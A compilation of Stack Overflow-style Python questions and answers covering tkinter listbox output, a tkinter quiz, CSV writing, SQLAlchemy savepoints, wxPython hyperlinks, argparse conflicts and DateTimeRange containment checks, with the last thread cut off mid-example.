Output a function in tkinter that prints
Question: I have created a function, which takes two arguments, prints multiple
statements out and eventually returns an answer. It works great in the python
shell.
I am using tkinter (python 3.4.1) to create a user friendly program for
consumers to use my function. I wish to have my function output everything to
something (I am using a listbox) and then the user could scroll through the
statements. However, it only outputs the return value, and not the print
statements. Why??
This is my code, and I believe the problem is in the PageOne class.
import tkinter as tk
from tkinter import ttk
from Collections import primes
from Collections import isprime
from Collections import LS
import sys
LARGE_FONT = ("Verdana", 12)
NORM_FONT = ("Verdana", 10)
SMALL_FONT = ("Verdana", 8)
def popupmsg(msg):
popup = tk.Tk()
popup.wm_title("!")
label = ttk.Label(popup, text=msg, font=NORM_FONT)
label.pack(side="top", fill="x", pady = 10)
B1 = ttk.Button(popup, text="Okay", command = popup.destroy)
B1.pack()
popup.mainloop()
class Mathapp(tk.Tk):
def __init__(self, *args, **kwargs):
tk.Tk.__init__(self, *args, **kwargs)
tk.Tk.iconbitmap(self, default="psi.ico")
tk.Tk.wm_title(self, "Math App")
container = tk.Frame(self)
container.pack(side="top", fill="both", expand = True)
container.grid_rowconfigure(0, weight=1)
container.grid_columnconfigure(0, weight=1)
menubar = tk.Menu(container)
filemenu = tk.Menu(menubar, tearoff = 0)
filemenu.add_command(label = "Save settings", command = lambda: popupmsg("Not supported just yet!"))
filemenu.add_separator()
filemenu.add_command(label = "Exit", command = quit)
menubar.add_cascade(label = "File", menu=filemenu)
prog = tk.Menu(menubar, tearoff = 0)
prog.add_command(label = "Legendre Symbol", command = lambda: popupmsg("Not supported just yet!"))
prog.add_command(label = "Prime Sieve", command = lambda: popupmsg("Not supported just yet!"))
prog.add_command(label = "Prime Factorisation - Sieve", command = lambda: popupmsg("Not supported just yet!"))
menubar.add_cascade(label = "Programs", menu=prog)
tk.Tk.config(self, menu=menubar)
self.frames = {}
for F in (StartPage, PageOne, PageTwo, PageThree):
frame = F(container, self)
self.frames[F] = frame
frame.grid(row=0, column=0, sticky="nsew")
self.show_frame(StartPage)
def show_frame(self, cont):
frame = self.frames[cont]
frame.tkraise()
class StartPage(tk.Frame):
def __init__(self, parent, controller):
tk.Frame.__init__(self, parent)
label = tk.Label(self, text="Start Page", font=LARGE_FONT)
label.pack(pady = 10, padx = 10)
button1 = ttk.Button(self, text="Legendre Symbol",
command = lambda: controller.show_frame(PageOne))
button1.pack()
button2 = ttk.Button(self, text="Prime test - Sieve",
command = lambda: controller.show_frame(PageTwo))
button2.pack()
button3 = ttk.Button(self, text="Prime Factorisation",
command = lambda: controller.show_frame(PageThree))
button3.pack()
class PageOne(tk.Frame):
def __init__(self, parent, controller):
tk.Frame.__init__(self, parent)
label = tk.Label(self, text="Legendre Symbol", font=LARGE_FONT)
label.pack(pady = 10, padx = 10)
button1 = ttk.Button(self, text="Back to home",
command = lambda: controller.show_frame(StartPage))
button1.pack()
##################
def show_answer():
Ans = str(LS(int(num1.get()),int(num2.get())))
listbox.delete(0,"end")
listbox.insert(0, LS(int(num1.get()),int(num2.get())))
tk.Label(self, text = "Enter the numbers to be tested ").pack()
num1 = tk.Entry(self)
num1.pack()
num2 = tk.Entry(self)
num2.pack()
blank = tk.Scrollbar(self)
blank.pack()
listbox= tk.Listbox(self, yscrollcommand=blank.set)
listbox.pack()
tk.Button(self, text = "Test", command = show_answer).pack()
##################
app = Mathapp()
app.mainloop()
Answer: It looks like the problem is probably here:
def show_answer():
Ans = str(LS(int(num1.get()),int(num2.get())))
listbox.delete(0,"end")
listbox.insert(0, LS(int(num1.get()),int(num2.get())))
I'd suggest creating a couple of entry widgets from the command line, and
modifying this function until you can get and print the contents of the
entries. You may have too much packed into one line in the `Ans` and
`listbox.insert` lines; try separating the different steps into different
lines of code. When you've got the entry widget contents, you might try
inserting them one at a time at the `end` index of the listbox (which of
course will be `0` if there's nothing in it yet, but `1` if there's already an
item).
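For example, a minimal rework of that function along those lines (reusing the `LS`, `num1`, `num2` and `listbox` names from the question) might look like this:
def show_answer():
    a = int(num1.get())
    b = int(num2.get())
    result = LS(a, b)  # call the function once and keep its return value
    listbox.delete(0, "end")  # clear any previous output
    listbox.insert("end", str(result))  # append at the end of the listbox
Keep in mind that `print` calls inside `LS` go to stdout, not to the widget, so only the values you explicitly `insert` will show up in the listbox.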
|
Sending information gathered from questionnaire to a Python document?
Question: I'm brand new to both Python and StackOverflow, and I have a problem that has
been stumping me for the past couple of hours.
I am making a peer-evaluation script for my high-school class. When you run
the script, you input your classmate's name, then you rate them 1-10 on
effort, accountability, and participation. These 3 values are then averaged.
This average is assigned to the variable "grade". Since each classmate is
going to get multiple grades, I need to have the "grade" variable export to
another Python document where I can average every grade for each respective
classmate.
So far, I have the script create a .txt file with the same name as the
evaluated classmate, and the grade integer is stored there. Does anyone know
of a way that I can export that integer to a Python file where I can append
each successive grade so they can then be averaged?
Thanks
# Python peer evaluation script
def script():
classmate = input('Please enter your classmate\'s name: ')
classmateString = str(classmate)
effortString = input('Please enter an integer from 1-10 signifying your classmate\'s overall effort during LLS: ')
effort = int(effortString)
accountabilityString = input('Please enter an integer from 1-10 signifying how accountable your classmate was during LLS: ')
accountability = int(accountabilityString)
participationString = input('Please enter an integer from 1-10 signifying your classmate\'s overall participation: ')
participation = int(participationString)
add = effort + accountability + participation
grade = add / 3
gradeString = str(grade)
print ('Your grade for ', classmate, 'is: ', grade)
print ('Thank you for your participation. Your input will help represent your classmate\'s grade for the LLS event.')
filename = (classmateString)+'.txt'
file = open(filename, 'a+')
file.write(gradeString)
file.close()
print ('Move on to next classmate?')
yes = set(['yes','y','Yes','Y'])
no = set(['no','n','No','n'])
choice = input().lower()
if choice in yes:
script()
elif choice in no:
sys.exit(0)
else:
sys.stdout.write("Please respond with 'yes' or 'no'")
script()
script()
Answer: Put
import name_of_script_file
at the top of your Python file, assuming they are in the same folder.
Then you can access the variable like:
name_of_script_file.variable_name
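For instance, if the script above were saved as `evaluation.py` (the file name here is just an illustration), the other file could do:
import evaluation  # runs evaluation.py's top-level code on first import
evaluation.script()  # call its function
# any module-level name is reachable as evaluation.<name>
Note that only names defined at module level are reachable this way; locals such as `grade` inside `script()` would need to be returned or stored at module level (or read back from the .txt files) first.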
|
Python TKinter: Not moving to next frame and not saving variables and radio buttons not saving answers
Question: Okay, so the main issues are as follows: I am not able to move from frame three to four all of a sudden, and when I have my buttons call the commands, they are not saving the names or checking whether the answers are correct. Any help would be appreciated.
from tkinter import *
import random
import sys
#Question class, list of questions, and method to ask and choose the questions
class Question():
def __init__(self,question,answer,options):
self.question = question
self.answer = answer
self.options = options
def ask(self):
print (self.question + "?")
for n, option in enumerate(self.options):
print ("%d) %s" % (n + 1, options))
response = int(sys.stdin.readline().strip()) # answers are integers
if response == self.answer:
print ("CORRECT")
else:
print ("wrong")
questions = [
Question("what is a group of crows called",1,["murder","the night's watch", "school", "flock"]),
Question("What is the square root of a potato",4,["does not exist","b)Half a potato"," c)Two equal portions that together add up to half the potato"," d)9"]),
Question("What is the name of the owner of the white wand in Harry Potter",2,["a)Harry"," b)Voldemort ","c)Snape ","d)Ron"]),
Question("How fast is a cheetah",2,["a)very fast"," b)ultra fast"," c)fast"," d)not as fast as the author of this game"]),
Question("How old must Spongebob be",4,[" a)9"," b)16"," c)58"," d)18"]),
Question("the best type of art is",3,[" a)classic"," b)french"," c)waveform"," d)electronic"]),
Question("the best sculputres are made out of",1,[" a)styrofoam"," b)chloroform"," c)metal"," d)clay"]),
Question("the best basketball player in the world is",3,[" a)chef curry"," b)stephanie cuurry"," c)Like Mike"," d)Paul George"]),
Question("the best soccer player in the world is",1,[" a)Harry Kane ","b)Shoalin Soccer Protaganist"," c)Neymar ","d)Rooney"]),
Question("which of the following people is an EGOT winner",1,[" a)whoopie goldberg"," b)neil patrick harris"," c)Tracy jordan"," d)Dule Hill"]),
Question("how many sides are on an egyptian pyramid",3,[" a)4"," b)5"," c)3000"," d)100"]),
Question("who is the real hero of the karate kid",4,[" a)ralph machio"," b)mr miyagi"," c)the tiger guy who almost beats ralph"," d)danny sans mom"]),
Question("which was not a best picture winner",2,[" a)birdman"," b)dark knight"," c)gladiator"," d)hurt locker"]),
Question("the most common surname is",3,[" a)smith"," b)mohamed"," c)Lee"," d)miller"]),
Question("is it a good choice to take APES",4,[" a)yes its easy"," b)no its stupid ","c)yes its very interesting"," d)no because in one year the dark overlord khatulu may wreak havoc on all environments"]),
]
random.shuffle(questions)
#for question in questions:
# question.ask()
########GUI##############
def setName():
user1 = userOneName.get()
user2 = userTwoName.get()
def raise_frame(frame):
frame.tkraise()
def combine_funcs(*funcs):
def combined_func(*args, **kwargs):
for f in funcs:
f(*args, **kwargs)
return 1
return combined_func
def checkAnswerUser1(intVariable, number):
if (intVariable == questions[number].answer):
user1Score = user1Score + 1
def checkAnswerUser2(intVariable, number):
if (intVariable == questions[number].answer):
user2Score = user2Score + 1
def resetGame():
userOneName = ""
userTwoName = ""
user1Score = 0
user2Score = 0
random.shuffle(questions)
root = Tk()
f1 = Frame(root)
f2 = Frame(root)
f3 = Frame(root)
f4 = Frame(root)
f5 = Frame(root)
f6 = Frame(root)
f7 = Frame(root)
f8 = Frame(root)
f9 = Frame(root)
f10 = Frame(root)
f11 = Frame(root)
f12 = Frame(root)
for frame in (f1, f2, f3, f4, f5, f6, f7, f8, f9, f10, f11, f12):
frame.grid(row=0, column=0, sticky='news')
### First Frame
#Labels and Entry boxes for user names
##content = StringVar()
##content2 = StringVar()
userOneLabel = Label(f1, text="User 1: Enter your name:")
userOneName = Entry(f1)
userTwoLabel = Label(f1, text="User 2: Enter your name:")
userTwoName = Entry(f1)
userOneLabel.pack(fill=X)
userOneName.pack(fill=X)
userTwoLabel.pack(fill=X)
userTwoName.pack(fill=X)
user1 = userOneName.get()
user2 = userTwoName.get()
user1Score = 0
user2Score = 0
##Next Button
NextButton = Button(f1, text='Next ---->', command=combine_funcs(lambda:raise_frame(f2),setName()))
NextButton.pack(side=RIGHT)
v = IntVar()
###Second Frame
questionPrinter1 = Label(f2, text= user1 + questions[0].question)
questionPrinter1.pack()
Radiobutton(f2, text=questions[0].options[0], variable=v, value=1).pack(side=TOP)
Radiobutton(f2, text=questions[0].options[1], variable=v, value=2).pack(side=TOP)
Radiobutton(f2, text=questions[0].options[2], variable=v, value=3).pack(side=TOP)
Radiobutton(f2, text=questions[0].options[3], variable=v, value=4).pack(side=TOP)
#When button is clicked, if the correct radio button is clicked, add 1 to the score
#add the same frame except change the user name
#do the choose random function every time the button is clicked
NextButton1 = Button(f2, text='Next ---->', command=combine_funcs(lambda:raise_frame(f3), checkAnswerUser1(v,0)))
NextButton1.pack(side=RIGHT)
###Third Frame
j = IntVar()
questionPrinter2 = Label(f3, text= (user1 + questions[1].question))
questionPrinter2.pack()
Radiobutton(f3, text=questions[1].options[0], variable=j, value=1).pack(side=TOP)
Radiobutton(f3, text=questions[1].options[1], variable=j, value=2).pack(side=TOP)
Radiobutton(f3, text=questions[1].options[2], variable=j, value=3).pack(side=TOP)
Radiobutton(f3, text=questions[1].options[3], variable=j, value=4).pack(side=TOP)
NextButton2 = Button(f3, text='Next ------>', command=(lambda:raise_frame(f4),checkAnswerUser2(j,1)))
NextButton2.pack(side=RIGHT)
###Fourth Frame
questionPrinter3 = Label(f4, text= user1 + questions[2].question)
questionPrinter3.pack()
k = IntVar()
Radiobutton(f4, text=questions[2].options[0], variable=k, value=1).pack(side=TOP)
Radiobutton(f4, text=questions[2].options[1], variable=k, value=2).pack(side=TOP)
Radiobutton(f4, text=questions[2].options[2], variable=k, value=3).pack(side=TOP)
Radiobutton(f4, text=questions[2].options[3], variable=k, value=4).pack(side=TOP)
NextButton3 = Button(f4, text='Next ---->', command=(lambda:raise_frame(f5),checkAnswerUser1(k,2)))
NextButton3.pack(side=RIGHT)
### Fifth Frame
questionPrinter3 = Label(f5, text= user1 + questions[3].question)
questionPrinter3.pack()
a = IntVar()
Radiobutton(f5, text=questions[3].options[0], variable=a, value=1).pack(side=TOP)
Radiobutton(f5, text=questions[3].options[1], variable=a, value=2).pack(side=TOP)
Radiobutton(f5, text=questions[3].options[2], variable=a, value=3).pack(side=TOP)
Radiobutton(f5, text=questions[3].options[3], variable=a, value=4).pack(side=TOP)
NextButton3 = Button(f5, text='Next ---->', command=(lambda:raise_frame(f6),checkAnswerUser2(a,3)))
NextButton3.pack(side=RIGHT)
###Sixth Frame
questionPrinter3 = Label(f6, text= user1 + questions[4].question)
questionPrinter3.pack()
b = IntVar()
Radiobutton(f6, text=questions[4].options[0], variable=b, value=1).pack(side=TOP)
Radiobutton(f6, text=questions[4].options[1], variable=b, value=2).pack(side=TOP)
Radiobutton(f6, text=questions[4].options[2], variable=b, value=3).pack(side=TOP)
Radiobutton(f6, text=questions[4].options[3], variable=b, value=4).pack(side=TOP)
NextButton3 = Button(f6, text='Next ---->', command=(lambda:raise_frame(f7),checkAnswerUser1(b,4)))
NextButton3.pack(side=RIGHT)
###7th Frame
questionPrinter3 = Label(f7, text= user1 + questions[5].question)
questionPrinter3.pack()
c = IntVar()
Radiobutton(f7, text=questions[5].options[0], variable=c, value=1).pack(side=TOP)
Radiobutton(f7, text=questions[5].options[1], variable=c, value=2).pack(side=TOP)
Radiobutton(f7, text=questions[5].options[2], variable=c, value=3).pack(side=TOP)
Radiobutton(f7, text=questions[5].options[3], variable=c, value=4).pack(side=TOP)
NextButton3 = Button(f7, text='Next --->', command=(lambda:raise_frame(f8),checkAnswerUser2(c,5)))
NextButton3.pack(side=RIGHT)
###8th Frame
questionPrinter3 = Label(f8, text= user1 + questions[6].question)
questionPrinter3.pack()
d = IntVar()
Radiobutton(f8, text=questions[6].options[0], variable=d, value=1).pack(side=TOP)
Radiobutton(f8, text=questions[6].options[1], variable=d, value=2).pack(side=TOP)
Radiobutton(f8, text=questions[6].options[2], variable=d, value=3).pack(side=TOP)
Radiobutton(f8, text=questions[6].options[3], variable=d, value=4).pack(side=TOP)
NextButton3 = Button(f8, text='Next --->', command=(lambda:raise_frame(f9),checkAnswerUser1(d,6)))
NextButton3.pack(side=RIGHT)
###9th Frame
questionPrinter3 = Label(f9, text= user1 + questions[7].question)
questionPrinter3.pack()
e = IntVar()
Radiobutton(f9, text=questions[7].options[0], variable=e, value=1).pack(side=TOP)
Radiobutton(f9, text=questions[7].options[1], variable=e, value=2).pack(side=TOP)
Radiobutton(f9, text=questions[7].options[2], variable=e, value=3).pack(side=TOP)
Radiobutton(f9, text=questions[7].options[3], variable=e, value=4).pack(side=TOP)
NextButton3 = Button(f9, text='Next --->', command=(lambda:raise_frame(f10),checkAnswerUser2(e,7)))
NextButton3.pack(side=RIGHT)
##10th Frame
questionPrinter3 = Label(f10, text= user1 + questions[8].question)
questionPrinter3.pack()
f = IntVar()
Radiobutton(f10, text=questions[8].options[0], variable=f, value=1).pack(side=TOP)
Radiobutton(f10, text=questions[8].options[1], variable=f, value=2).pack(side=TOP)
Radiobutton(f10, text=questions[8].options[2], variable=f, value=3).pack(side=TOP)
Radiobutton(f10, text=questions[8].options[3], variable=f, value=4).pack(side=TOP)
NextButton3 = Button(f10, text='Next --->', command=(lambda:raise_frame(f11),checkAnswerUser1(f,8)))
NextButton3.pack(side=RIGHT)
##11th Frame
questionPrinter3 = Label(f11, text= user1 + questions[9].question)
questionPrinter3.pack()
g = IntVar()
Radiobutton(f11, text=questions[9].options[0], variable=g, value=1).pack(side=TOP)
Radiobutton(f11, text=questions[9].options[1], variable=g, value=2).pack(side=TOP)
Radiobutton(f11, text=questions[9].options[2], variable=g, value=3).pack(side=TOP)
Radiobutton(f11, text=questions[9].options[3], variable=g, value=4).pack(side=TOP)
NextButton3 = Button(f11, text='Next --->', command=(lambda:raise_frame(f12),checkAnswerUser2(g,9)))
NextButton3.pack(side=RIGHT)
## 12th and final frame
User1ScorePrinter = Label(f12, text= user1 + "'s score is:" + str(user1Score))
User1ScorePrinter.pack()
User2ScorePrinter = Label(f12, text= user2 + "'s score is:" + str(user1Score))
User2ScorePrinter.pack()
User1Winner = Label(f12, text = user1 + "is the winner")
User2Winner = Label(f12, text = user2 + "is the winner")
if(user1Score > user2Score):
User1Winner.pack()
else:
User2Winner.pack()
####when the game is reset, the user names should be reset, the questions should be shuffled, and the scores should be reset
NextButton3 = Button(f12, text='Restart the Game', command=combine_funcs(lambda:raise_frame(f1),resetGame()))
NextButton3.pack()
raise_frame(f1)
root.mainloop()
Answer: You don't need 12 frames to solve this. You can expand the Question class to
handle everything associated with a group of questions, which is exactly what
a class structure does. Note that this follows your code, but is quick and
dirty just to show how it is done, so you can and should make improvements.
class Question():
def __init__(self, root, questions):
self.fr=Frame(root)
self.fr.pack(side="top")
self.questions = questions
self.correct=False
self.ask()
def ask(self):
print (self.questions[0] + "?")
## [0]=question, [1]=correct answer
Label(self.fr, text=self.questions[0]+"?",
bg="lightyellow").pack()
self.options=self.questions[2]
self.correct_answer=self.options[self.questions[1]-1]
self.v=IntVar()
self.v.set(0)
## allow for options of different lengths
for ctr in range(len(self.options)):
b=Radiobutton(self.fr, text=self.options[ctr], variable=self.v, value=ctr,
command=self.check_answer)
b.pack()
self.result=Label(self.fr, text="", bg="lightblue")
self.result.pack()
def check_answer(self):
self.correct=False
number=self.v.get()
if (self.correct_answer == self.options[number]):
self.correct=True
self.result["text"]="Correct"
else:
self.result["text"]="Wrong"
## while testing
print(self.correct, number, self.options[number])
class AskAllQuestions():
def __init__(self, root):
self.root=root
self.this_question=0
self.total_correct=0
self.TQ=None
self.next_but=None
self.shuffle_questions()
self.next_question()
def next_question(self):
""" self.this_question is a number that increments on each pass
self.question_order is a list of numbers in random order
so self.next_question picks the self.this_question number
from the random order self.question_order list
"""
if self.TQ: ## not first question
if self.TQ.correct:
self.total_correct += 1
print "Total Correct", self.total_correct
self.TQ.fr.destroy()
self.next_q_fr.destroy()
if self.this_question < len(self.question_order):
this_question_num=self.question_order[self.this_question]
self.this_question += 1
self.next_q_fr=Frame(self.root)
self.next_q_fr.pack(side="bottom")
self.next_but=Button(self.next_q_fr, text='Next ---->', bg="orange",
command=self.next_question)
self.next_but.pack(side="top")
Button(self.next_q_fr, text="End Program", command=root.quit,
bg="red").pack(side="bottom")
self.TQ=Question(self.root, self.all_questions[this_question_num])
else:
self.root.quit()
def shuffle_questions(self):
self.all_questions = [
("what is a group of crows called",1,["murder","the night's watch", "school", "flock"]),
("What is the square root of a potato",4,["does not exist","b)Half a potato"," c)Two equal portions that together add up to half the potato"," d)9"]),
("What is the name of the owner of the white wand in Harry Potter",2,["a)Harry"," b)Voldemort ","c)Snape ","d)Ron"]),
("How fast is a cheetah",2,["a)very fast"," b)ultra fast"," c)fast"," d)not as fast as the author of this game"]),
("How old must Spongebob be",4,[" a)9"," b)16"," c)58"," d)18"]),
("the best type of art is",3,[" a)classic"," b)french"," c)waveform"," d)electronic"]),
("the best sculputres are made out of",1,[" a)styrofoam"," b)chloroform"," c)metal"," d)clay"]),
("the best basketball player in the world is",3,[" a)chef curry"," b)stephanie cuurry"," c)Like Mike"," d)Paul George"]),
("the best soccer player in the world is",1,[" a)Harry Kane ","b)Shoalin Soccer Protaganist"," c)Neymar ","d)Rooney"]),
("which of the following people is an EGOT winner",1,[" a)whoopie goldberg"," b)neil patrick harris"," c)Tracy jordan"," d)Dule Hill"]),
("how many sides are on an egyptian pyramid",3,[" a)4"," b)5"," c)3000"," d)100"]),
("who is the real hero of the karate kid",4,[" a)ralph machio"," b)mr miyagi"," c)the tiger guy who almost beats ralph"," d)danny sans mom"]),
("which was not a best picture winner",2,[" a)birdman"," b)dark knight"," c)gladiator"," d)hurt locker"]),
("the most common surname is",3,[" a)smith"," b)mohamed"," c)Lee"," d)miller"]),
("is it a good choice to take APES",4,[" a)yes its easy"," b)no its stupid ","c)yes its very interesting"," d)no because in one year the dark overlord khatulu may wreak havoc on all environments"]),
]
self.question_order=list(range(len(self.all_questions)))
random.shuffle(self.question_order)
root=Tk()
AQ=AskAllQuestions(root)
root.mainloop()
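As a side note on the original symptom: lines such as `command=(lambda:raise_frame(f4),checkAnswerUser2(j,1))` build a tuple, so `checkAnswerUser2` runs once at widget-creation time (and with the `IntVar` itself rather than its value), while the click is handed a non-callable tuple. A minimal sketch of a deferred command using the question's own `combine_funcs` helper, assuming the same names, would be:
NextButton2 = Button(f3, text='Next ------>',
                     command=combine_funcs(lambda: checkAnswerUser2(j.get(), 1),
                                           lambda: raise_frame(f4)))
The check functions would also need `global` declarations for the score counters (or an object holding the scores) for the increments to stick.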
|
write a Python 3 list to .csv
Question: I have a list that I need to write to a .csv. Yes, I have done a LOT of looking around (of course I found [this link](http://stackoverflow.com/questions/9372705/how-to-write-a-list-to-a-csv-file), which is close to the target, but misses my case). You see, `writerows` is having all sorts of trouble with the delimiters/formatting in the .csv (the **a** gets separated from the **1** from the **7**, etc.).
My list looks like this:
`buffer = [['a17', 'b17', 'c17', '8', 'e17', 'f17\n'], ['a24', 'b24', 'c24',
'6', 'e24', 'f24\n'], ['a27', 'b27', 'c27', '9', 'e27', 'f27\n'], ['a18',
'b18', 'c18', '9', 'e18', 'f18\n'], ['a5', 'b5', 'c5', '5', 'e5', 'f5\n'],
['a20', 'b20', 'c20', '2', 'e20', 'f20\n'], ['a10', 'b10', 'c10', '1', 'e10',
'f10\n'], ['a3', 'b3', 'c3', '3', 'e3', 'f3\n'], ['a11', 'b11', 'c11', '2',
'e11', 'f11\n']]`
I can see it's like a list of lists, so I tried `for eachRow in buffer:` followed by `eachRow.split(',')`, but no good there either. I just need to write to a .csv; it should be easy, right... what am I missing?
Answer: You can remove the \n string from your buffer like so. Also you have to add
`newline=''` to the with statement in Python 3. See [this
answer](http://stackoverflow.com/a/16716489/1519290) for more detail.
import csv
buffer = [['a17', 'b17', 'c17', '8', 'e17', 'f17\n'],
['a24', 'b24', 'c24', '6', 'e24', 'f24\n'],
['a27', 'b27', 'c27', '9', 'e27', 'f27\n'],
['a18', 'b18', 'c18', '9', 'e18', 'f18\n'],
['a5', 'b5', 'c5', '5', 'e5', 'f5\n'],
['a20', 'b20', 'c20', '2', 'e20', 'f20\n'],
['a10', 'b10', 'c10', '1', 'e10', 'f10\n'],
['a3', 'b3', 'c3', '3', 'e3', 'f3\n'],
['a11', 'b11', 'c11', '2', 'e11', 'f11\n']]
for row in buffer:
for index, string in enumerate(row):
row[index] = string.replace('\n', '')
with open('output.csv', 'w', newline='') as f:
writer = csv.writer(f)
writer.writerows(buffer)
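If you'd rather not mutate `buffer` in place, the same cleanup can be done with a list comprehension just before writing:
cleaned = [[cell.replace('\n', '') for cell in row] for row in buffer]
with open('output.csv', 'w', newline='') as f:
    csv.writer(f).writerows(cleaned)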
|
IntegrityError not caught in SQLAlchemy event listener
Question: I'm building a simple database driven blog with Flask and SQLAlchemy. In the
model for the blog postings I define title and slug attributes:
class BlogPost(Model):
...
title = Column(String(80))
slug = Column(String(80), unique=True)
Later I use an event listener to automatically create and insert a slug from
the title:
@event.listens_for(BlogPost.title, 'set')
def autoslug(target, value, oldvalue, initiator):
target.slug = slugify(value)
As expected, if I try to add a post to the database, and the title of the post
evaluates to the same slug as a previous post, then the transaction fails with
an IntegrityError. I don't think in practice this will be a problem anyway.
But just for giggles I tried something like this:
from sqlalchemy.exc import IntegrityError
@event.listens_for(BlogPost.title, 'set')
def autoslug(target, value, oldvalue, initiator):
try:
target.slug = slugify(value)
except IntegrityError:
target.slug = slugify(value) + random_string()
`random_string` could be anything, really, the point is that nothing that I've
tried gets executed because the IntegrityError isn't getting caught, and I'm
not sure why - attempting to add & commit a post to the database with the same
title still raises an IntegrityError and aborts the transaction when I try to
commit. I've seen a handful of other posts about it, but the answers are
mostly pretty specific to Pyramid, which I'm not using.
Anybody know what I'm missing here?
Tech involved: Python3, Flask, Flask-Sqlalchemy, Sqlalchemy
Answer: SQLAlchemy will not [flush](http://docs.sqlalchemy.org/en/latest/orm/session_basics.html#flushing) changes to model objects to the DB when an attribute is set. In order to get the error at that point, you have to do something like:
from sqlalchemy.exc import IntegrityError
from sqlalchemy.orm.session import object_session
@event.listens_for(BlogPost.title, 'set')
def autoslug(target, value, oldvalue, initiator):
session = object_session(target)
try:
with session.begin_nested():
target.slug = slugify(value)
session.flush()
except IntegrityError:
target.slug = slugify(value) + random_string()
Note that you have to wrap your possible integrity violation in a nested
transaction (a [savepoint](https://en.wikipedia.org/wiki/Savepoint)), or your
whole transaction will fail even though you catch the `IntegrityError`. If
your DB doesn't support savepoints or an SQLAlchemy implementation of the
idea, you're out of luck.
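(`slugify` and `random_string` are the question's own helpers; `random_string` could be as simple as this sketch:)
import random
import string

def random_string(length=6):
    # short random suffix to make a colliding slug unique
    return '-' + ''.join(random.choice(string.ascii_lowercase + string.digits)
                         for _ in range(length))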
|
How to unset or disable hyperlinkctrl in wxpython only on some conditions
Question: I have created a HyperlinkCtrl on my panel. Under some conditions it should be a hyperlink, but in other cases it should be just text, not a link. How do I do this?
self.Author = wx.HyperlinkCtrl(self, -1, "", "~")
if true:
self.Author.SetLabel(str(self.aList['Author']))
self.Author.SetURL("mailto:%s" % str(self.aList['Author']))
else:
self.Author.SetLabel("N/A")
self.Author.SetURL("N/A")
In the else case with `"N/A"` it is still a link. Can anyone tell me how to unset the URL in wxPython?
Answer: Simply toggle between:
self.Author.Enable()
and:
self.Author.Disable()
Edit: To redisplay `self.Author` without the underline which goes with a
hyperlink
import wx
class MyFrame(wx.Frame):
def __init__(self, parent, id, title):
wx.Frame.__init__(self, parent, id, title, (-1, -1), wx.Size(300, 200))
self.panel1 = wx.Panel(self)
self.Author = wx.HyperlinkCtrl(self.panel1, -1, "", "http://127.0.0.1/some_directory/",pos=(30,50))
self.Button = wx.Button(self.panel1, -1, "Click Me", pos=(80,100))
self.Button.Bind(wx.EVT_BUTTON, self.OnButton)
self.Show()
def OnButton(self,event):
self.Author.Hide()
if self.Author.IsEnabled():
self.Author = wx.StaticText(self.panel1, -1, "http://127.0.0.1/some_directory/", pos=(30,50))
self.Author.Disable()
else:
self.Author = wx.HyperlinkCtrl(self.panel1, -1, "", "http://127.0.0.1/some_directory/", pos=(30,50))
self.Author.Enable()
self.Author.Show()
self.Update()
if __name__ == '__main__':
app = wx.App()
frame = MyFrame(None, -1, 'Hyperlink')
app.MainLoop()
|
Handling argparse conflicts
Question: If I import a Python [module](https://github.com/paulcalabro/api-kickstart/blob/master/examples/python/config.py) that is already using **argparse**, but I would also like to use **argparse** in my own script, how should I go about doing this? I'm receiving an _unrecognized arguments_ error when using the following code and invoking the script with a -t flag:
**Snippet:**
#!/usr/bin/env python
....
import conflicting_module
import argparse
...
#################################
# Step 0: Configure settings... #
#################################
parser = argparse.ArgumentParser(description='Process command line options.')
parser.add_argument('--test', '-t')
**Error:**
unrecognized arguments: -t foobar
Answer: You need to guard your **imported modules** with
if __name__ == '__main__':
...
so that they don't run initialization code, such as argument parsing, on import. See [What does `if __name__ == "__main__":` do?](http://stackoverflow.com/questions/419163/what-does-if-name-main-do).
So, in your `conflicting_module` do
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Process command line options in conflicting_module.py.')
parser.add_argument('--conflicting', '-c')
...
instead of just creating the parser globally.
If the parsing in `conflicting_module` is a mandatory part of application
configuration, consider using
args, rest = parser.parse_known_args()
in your main module and passing `rest` to `conflicting_module`, where you'd
pass either `None` or `rest` to `parse_args`:
args = parser.parse_args(rest)
That is still a bit bad style and actually the classes and functions in
`conflicting_module` would ideally receive parsed configuration arguments from
your main module, which would be responsible for parsing them.
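Putting that together, a minimal sketch of the main script might look like this (`configure` is a hypothetical entry point in `conflicting_module` that accepts the leftover arguments; the real module may expose something different):
#!/usr/bin/env python
import argparse
import conflicting_module

parser = argparse.ArgumentParser(description='Process command line options.')
parser.add_argument('--test', '-t')
args, rest = parser.parse_known_args()

# hand the unconsumed arguments to the other module instead of letting it parse sys.argv
conflicting_module.configure(rest)  # hypothetical helper, not part of the real module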
|
How to check if a date period is embraced by another date period in python?
Question: What is the most pythonic way to check if a date period is embraced by another
date period in python?
for example
start_1 = datetime.datetime(2016, 3, 16, 20, 30)
end_1 = datetime.datetime(2016, 3, 17, 20, 30)
start_2 = datetime.datetime(2016, 3, 14, 20, 30)
end_2 = datetime.datetime(2016, 3, 17, 22, 30)
so `[start_1, end_1]` obviously lies inside `[start_2, end_2]`, you can check
it by using `<`, `>` operators, but I'd like to know if there's a library
function to perform this check easily.
Answer: You can do that using a pip module:
pip install DateTimeRange
which can be used:
>>> start_1 = datetime.datetime(2016, 3, 16, 20, 30)
>>> end_1 = datetime.datetime(2016, 3, 17, 20, 30)
>>> start_2 = datetime.datetime(2016, 3, 14, 20, 30)
>>> end_2 = datetime.datetime(2016, 3, 17, 22, 30)
>>> dtr1 = datetimerange.DateTimeRange(start_1, end_1)
>>> dtr2 = datetimerange.DateTimeRange(start_2, end_2)
You can check whether one range intersects the other:
>>> dtr1.is_intersection(dtr2)
True
But it does not show whether the range is fully within the other. To check
whether a time range contains another, you still have to check boundaries:
>>> dtr1.start_datetime in dtr2
True
>>> dtr1.end_datetime in dtr2
True
Though I believe this is a good opportunity for a patch: implementing the `__contains__` method in a fashion that supports a `DateTimeRange` as the left-hand-side argument of the `in` operator.
>>> dtr1 in dtr2
[…] /datetimerange/__init__.py", line 136, in __contains__
return self.start_datetime <= value <= self.end_datetime
TypeError: unorderable types: datetime.datetime() <= DateTimeRange()
_Nota Bene_ : I have [pushed a
commit](https://github.com/thombashi/DateTimeRange/pull/12) to make that
possible, so now the following works:
>>> import datetime
>>> import datetimerange
>>> start_1 = datetime.datetime(2016, 3, 16, 20, 30)
>>> start_2 = datetime.datetime(2016, 3, 14, 20, 30)
>>> end_1 = datetime.datetime(2016, 3, 17, 20, 30)
>>> end_2 = datetime.datetime(2016, 3, 17, 22, 30)
